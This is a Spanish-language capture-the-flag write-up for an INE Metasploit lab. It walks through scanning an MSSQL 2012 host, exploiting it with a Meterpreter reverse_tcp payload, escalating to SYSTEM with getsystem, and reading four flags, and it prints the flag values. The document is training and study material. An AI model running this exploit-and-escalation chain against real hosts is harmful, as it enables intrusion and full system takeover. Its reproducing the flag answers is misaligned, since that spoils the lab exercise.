~/write-ups/writeup-dda7d93542

Host & Network Penetration Testing: The Metasploit Framework CTF 1

Imported from Notion: Host & Network Penetration Testing: The Metasploit Framework CTF 1

target:: Notion MEDIUM date:: 2026.07.26 notion

🧪 Flag 1: Explotando MSSQL Server

Objetivo: Acceder a la cuenta MSSQLSERVER.

  1. Iniciar servicios y Metasploit:
service postgresql start
msfconsole -q
  1. Verificar conexión de la base de datos:
db_status
  1. Escaneo con Nmap desde Metasploit:
db_nmap -p 1433 -sV target​.ine.l​ocal -sC -O --ossc​an-gue​ss

✔ Se encontró el servicio Microsoft SQL Server 2012 en el puerto 1433. (Medium)

  1. Seleccionar y configurar exploit:
search Microsoft SQL Server 2012
use 0
set payload window​s/x64/​meterp​reter/​revers​e_tcp
set RHOSTS target​.ine.l​ocal
run
  1. Meterpreter session exitosa.

  2. Acceder a shell y leer la bandera:

shell
cd \
dir
type flag1.txt

👉 Flag 1: c3f6a31554ec41f7beeb6f5260b2527b

✅ Capturada. (Medium)


🧪 Flag 2: Carpeta de Configuración de Windows

Hint: El siguiente flag está en el directorio de configuración de Windows.

  1. Intentar acceder a configuraciones:
cd C:\Windows\System32\config

Access Denied inicialmente. (Medium)

  1. Comprobar privilegios disponibles:
getprivs

✔ Se descubre SeImpersonatePrivilege. (Medium)

  1. Escalada de privilegios:
getsystem
  1. Acceder a carpeta y leer flag2.txt:
shell
cd C:\Windows\System32\config
dir
type flag2.txt

👉 Flag 2: 9e03002d5c144b2982ac17bdafdb540f

✅ Capturada. (Medium)


🔎 Flag 3: Buscar Archivo Oculto en System32

Hint: Una bandera está escondida en algún lugar de System32.

  1. Buscar archivos .txt recursivamente:
dir C:\Windows\System32\*.txt /s /b
  1. Encontrar archivo oculto y visualizar:
type C:\Windows\System32\drivers\escalt​ePrivi​legeTo​GetThi​sFlag.​txt

👉 Flag 3: f96b7f4019d04d5682d34f8e78cc01b8

✅ Capturada. (Medium)


🏁 Flag 4: Escritorio de Administrator

  1. Navegar al perfil de Administrator:
cd C:\Users\Admini​strato​r\Desktop
dir
  1. Leer archivo flag4.txt:
type flag4.txt

👉 Flag 4: c8c07f571b9e498987233497389b1eee

✅ Capturada. (Medium)


📌 Resumen Final

FlagUbicaciónMétodo
1MSSQLSERVERExplotación MSSQL + Meterpreter
2Configuración WindowsPrivilege Escalation (getsystem)
3System32 (archivo oculto)Búsqueda de archivos
4Administrator DesktopLectura directa de archivo

Si quieres, también te puedo poner las capturas de pantalla con enlaces directos incrustados para que lo tengas tipo reporte pro en Notion 👌

- EOF -

<< back_to_index